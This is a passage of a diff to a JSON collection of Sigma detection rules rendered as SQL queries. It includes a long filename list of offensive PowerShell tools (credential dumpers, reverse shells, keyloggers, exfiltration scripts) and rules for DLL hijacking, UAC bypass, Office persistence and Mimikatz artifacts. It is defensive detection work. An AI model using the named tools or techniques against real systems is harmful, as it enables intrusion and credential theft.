'%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + 
"filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Password Protected ZIP File Opened", - "id": "00ba9da1-b510-4f6b-b258-8d338836180f", + "title": "Potential Initial Access via DLL Search Order Hijacking", + "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "author": "Tim Rauch (rule), Elastic (idea)", + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip.yml" + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" }, { - "title": "DCERPC SMB Spoolss Named Pipe", - "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", - "status": "test", - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "author": "OTR (Open Threat Research)", + "title": "Suspicious LNK Double Extension Files", + "id": "3215aa19-f060-4332-86d5-5602511f3ca8", + "status": "experimental", + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Domain Controllers acting as printer servers too? :)" + "Users creating a shortcut on e.g. 
desktop" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" + "filename": "file_event_win_susp_lnk_double_extension.yml" }, { - "title": "Local User Creation", - "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", - "status": "test", - "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. 
Apply this Sigma Use Case on your windows server logs and not on your DC logs.", - "author": "Patrick Bareiss", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "status": "experimental", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547" ], "falsepositives": [ - "Domain Controller Logs", - "Local accounts managed by privileged account management tools" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_user_creation.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "status": "test", + "description": "Detects potential persistence 
activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", + "title": "Creation of a Diagcab", + "id": "3d0ed417-3d94-4963-a562-4a92c940656a", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + 
"attack.resource_development" ], "falsepositives": [ - "Unknown" + "Legitimate microsoft diagcab" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%.diagcab' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_susp_diagcab.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Outgoing Logon 
with New Credentials", - "id": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "status": "experimental", - "description": "Detects logon events that specify new credentials", + "description": "Detects creation of template files for Microsoft Office from outside Office", "author": "Max Altgelt (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137" + ], "falsepositives": [ - "Legitimate remote administration activity" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9')" + "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_logon_newcredentials.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": 
"Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.discovery", - "attack.t1012", "attack.credential_access", - "attack.t1552.002" + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "Possible DC Shadow Attack", - "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detects DCShadow via create new SPN", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1207" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Valid on domain controllers; exclude known DCs" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR 
